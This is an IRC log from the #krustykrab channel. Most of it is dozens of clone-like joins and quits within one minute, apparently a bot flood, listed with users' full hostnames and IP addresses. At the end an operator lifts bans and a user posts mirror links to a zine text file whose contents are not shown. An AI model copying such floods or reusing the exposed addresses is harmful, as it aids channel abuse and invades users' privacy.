[~PsychoLo@177.141.142.148] has joined #krustykrab 00:20 -!- DezmAster [~greendad@124.ip-149-202-38.eu] has joined #krustykrab 00:20 -!- Asthma [~Tedo@124.ip-149-202-38.eu] has joined #krustykrab 00:20 -!- krivohodu [~InfoServ@159.203.20.244] has joined #krustykrab 00:20 -!- billing [~Romanson@159.203.20.244] has joined #krustykrab 00:20 -!- brainsuck [~Bobby@177.141.210.177] has joined #krustykrab 00:20 -!- pucha [~grundik@177.141.210.177] has joined #krustykrab 00:20 -!- miczor [~skillz@li203-118.members.linode.com] has joined #krustykrab 00:20 -!- Mersas [~Sonic@li203-118.members.linode.com] has joined #krustykrab 00:20 -!- Neznakomk [~highQ@120.199.64.165] has joined #krustykrab 00:20 -!- LeroyNew [~xMorda@120.199.64.165] has joined #krustykrab 00:20 -!- galkin [~rashn@177.141.9.235] has joined #krustykrab 00:20 -!- excaseron [~dolphin@177.141.9.235] has joined #krustykrab 00:20 -!- AtmacA [~Ryo@177.142.115.216] has joined #krustykrab 00:20 -!- Fidel [~evilmayc@177.142.115.216] has joined #krustykrab 00:20 -!- laznet [~Aimetti@177.142.112.113] has joined #krustykrab 00:20 -!- mrwert [~josh@177.142.112.113] has joined #krustykrab 00:20 -!- spastanec [~Kovec@177.142.120.149] has joined #krustykrab 00:20 -!- McLaren [~Liogoft@60.163.212.239] has quit [Remote host closed the connection] 00:20 -!- Snatch [~Chilean@60.163.212.239] has quit [Remote host closed the connection] 00:20 -!- omgmyname [~chuchark@177.142.133.62] has joined #krustykrab 00:20 -!- Champion [~logik@177.142.133.62] has joined #krustykrab 00:20 -!- SnowB [~Tachini@177.142.120.149] has joined #krustykrab 00:20 -!- cesarton [~satira@177.142.203.157] has joined #krustykrab 00:20 -!- chubbycan [~cumehxp@177.142.203.157] has joined #krustykrab 00:20 -!- Bumer [~Vnik@177.142.21.108] has joined #krustykrab 00:20 -!- Golod [~plusik@177.142.220.76] has joined #krustykrab 00:20 -!- lorenzo [~joers@177.142.220.76] has joined #krustykrab 00:20 -!- elbrus [~Aum@177.142.21.108] has joined #krustykrab 00:20 -!- MadGenius [~Graph@177.142.53.155] has joined #krustykrab 00:20 -!- synia [~softneed@177.142.53.155] has joined #krustykrab 00:20 -!- slimer [slimer@lapi.date] has joined #krustykrab 00:20 -!- Guliver [~vaddk@177.142.53.167] has joined #krustykrab 00:20 -!- oewoqgwe [~Union@177.142.53.167] has joined #krustykrab 00:20 -!- poru [~ddfrff@177.142.58.92] has joined #krustykrab 00:20 -!- Citatel [~immortal@177.142.58.92] has joined #krustykrab 00:20 -!- teterev [~Kusok@177.32.210.7] has joined #krustykrab 00:20 -!- Asthma [~Tedo@124.ip-149-202-38.eu] has quit [Remote host closed the connection] 00:20 -!- DezmAster [~greendad@124.ip-149-202-38.eu] has quit [Remote host closed the connection] 00:20 -!- JeIbi [~resource@ns529764.ip-149-56-23.net] has quit [Remote host closed the connection] 00:20 -!- Wolfgang [~sonyr@ns529764.ip-149-56-23.net] has quit [Read error: Connection reset by peer] 00:20 -!- underpra [~qrot@108-208-153-119.lightspeed.frokca.sbcglobal.net] has quit [Remote host closed the connection] 00:20 -!- TIMAFEI [~fesasb@108-208-153-119.lightspeed.frokca.sbcglobal.net] has quit [Remote host closed the connection] 00:20 -!- Golod [~plusik@177.142.220.76] has quit [Remote host closed the connection] 00:20 -!- lorenzo [~joers@177.142.220.76] has quit [Remote host closed the connection] 00:20 -!- chubbycan [~cumehxp@177.142.203.157] has quit [Remote host closed the connection] 00:20 -!- elbrus [~Aum@177.142.21.108] has quit [Remote host closed the connection] 00:20 -!- andjey [~zoom@147.8.124.5] has quit [Remote host closed the connection] 00:20 -!- BapBap [~pashabre@147.8.124.5] has quit [Remote host closed the connection] 00:20 -!- AtmacA [~Ryo@177.142.115.216] has quit [Remote host closed the connection] 00:20 -!- omgmyname [~chuchark@177.142.133.62] has quit [Remote host closed the connection] 00:20 -!- cesarton [~satira@177.142.203.157] has quit [Remote host closed the connection] 00:20 -!- laznet [~Aimetti@177.142.112.113] has quit [Remote host closed the connection] 00:20 -!- mrwert [~josh@177.142.112.113] has quit [Remote host closed the connection] 00:20 -!- Guliver [~vaddk@177.142.53.167] has quit [Remote host closed the connection] 00:20 -!- billing [~Romanson@159.203.20.244] has quit [Read error: Connection reset by peer] 00:20 -!- pucha [~grundik@177.141.210.177] has quit [Remote host closed the connection] 00:20 -!- krivohodu [~InfoServ@159.203.20.244] has quit [Remote host closed the connection] 00:20 -!- Bumer [~Vnik@177.142.21.108] has quit [Remote host closed the connection] 00:20 -!- synia [~softneed@177.142.53.155] has quit [Remote host closed the connection] 00:20 -!- MadGenius [~Graph@177.142.53.155] has quit [Remote host closed the connection] 00:20 -!- oewoqgwe [~Union@177.142.53.167] has quit [Remote host closed the connection] 00:20 -!- Champion [~logik@177.142.133.62] has quit [Remote host closed the connection] 00:20 -!- SnowB [~Tachini@177.142.120.149] has quit [Remote host closed the connection] 00:20 -!- spastanec [~Kovec@177.142.120.149] has quit [Remote host closed the connection] 00:20 -!- Fidel [~evilmayc@177.142.115.216] has quit [Remote host closed the connection] 00:20 -!- brainsuck [~Bobby@177.141.210.177] has quit [Remote host closed the connection] 00:20 -!- klokus [~maratej@177.140.35.129] has quit [Remote host closed the connection] 00:20 -!- DonnyDark [~skrip@177.140.35.129] has quit [Remote host closed the connection] 00:20 -!- Citatel [~immortal@177.142.58.92] has quit [Remote host closed the connection] 00:20 -!- poru [~ddfrff@177.142.58.92] has quit [Remote host closed the connection] 00:20 -!- teterev [~Kusok@177.32.210.7] has quit [Remote host closed the connection] 00:20 -!- Mersas [~Sonic@li203-118.members.linode.com] has quit [Remote host closed the connection] 00:20 -!- Opel [~PsychoLo@177.141.142.148] has quit [Remote host closed the connection] 00:20 -!- press [~prizrak@177.141.142.148] has quit [Remote host closed the connection] 00:20 -!- alexkras [~enx@server.ggsitebuilder.com] has quit [Remote host closed the connection] 00:20 -!- carlo [~Vella@server.ggsitebuilder.com] has quit [Read error: Connection reset by peer] 00:20 -!- galkin [~rashn@177.141.9.235] has quit [Remote host closed the connection] 00:20 -!- excaseron [~dolphin@177.141.9.235] has quit [Remote host closed the connection] 00:20 -!- Profffa [~emix@211.233.56.228] has quit [Remote host closed the connection] 00:20 -!- UMANOID [~Kolumb@45.32.23.39] has quit [Remote host closed the connection] 00:20 -!- hwknz [~evilmayc@45.32.23.39] has quit [Remote host closed the connection] 00:20 -!- Romeo [~laksys@211.233.56.228] has quit [Remote host closed the connection] 00:20 -!- LeroyNew [~xMorda@120.199.64.165] has quit [Remote host closed the connection] 00:20 -!- Neznakomk [~highQ@120.199.64.165] has quit [Remote host closed the connection] 00:20 -!- live [~allexeyy@ec2-54-244-200-32.us-west-2.compute.amazonaws.com] has quit [Remote host closed the connection] 00:20 -!- sarrini [~vPalto@ec2-54-244-200-32.us-west-2.compute.amazonaws.com] has quit [Remote host closed the connection] 00:20 -!- lumumba [~claustro@177.32.210.7] has joined #krustykrab 00:20 -!- lumumba [~claustro@177.32.210.7] has quit [Remote host closed the connection] 00:20 -!- miczor [~skillz@li203-118.members.linode.com] has quit [Write error: Broken pipe] 00:20 -!- acidvegas [~y0rd@spider.ircd.moe] has joined #krustykrab 00:21 -!- pequ [penguin@znc.hostsailor.com] has quit [Read error: Operation timed out] 00:21 -!- mode/#krustykrab [-b *!*@fuckin.business] by cofk 00:21 -!- slimer [slimer@lapi.date] has left #krustykrab [] 00:21 -!- mode/#krustykrab [-b *!*@fuck.energy] by cofk 00:21 <+opcon_> ava lul m8s 00:21 -!- mode/#krustykrab [-b *!c@*] by cofk 00:21 -!- chrono [c@fuckin.business] has joined #krustykrab 00:21 -!- mode/#krustykrab [+o chrono] by phreakaz 00:21 <@chrono> hi buds mirrors: https://supernets.org/dl/lrhzine1.txt https://pastebin.com/raw/0ct9pzVX https://pastebin.com/raw/0SDw7F5H https://0bin.net/paste/jOXhlb02kvsl+cyQ#5AimbD-D+uEGlHRSoZGd3orepYjeiqoxMwoY5s77zYB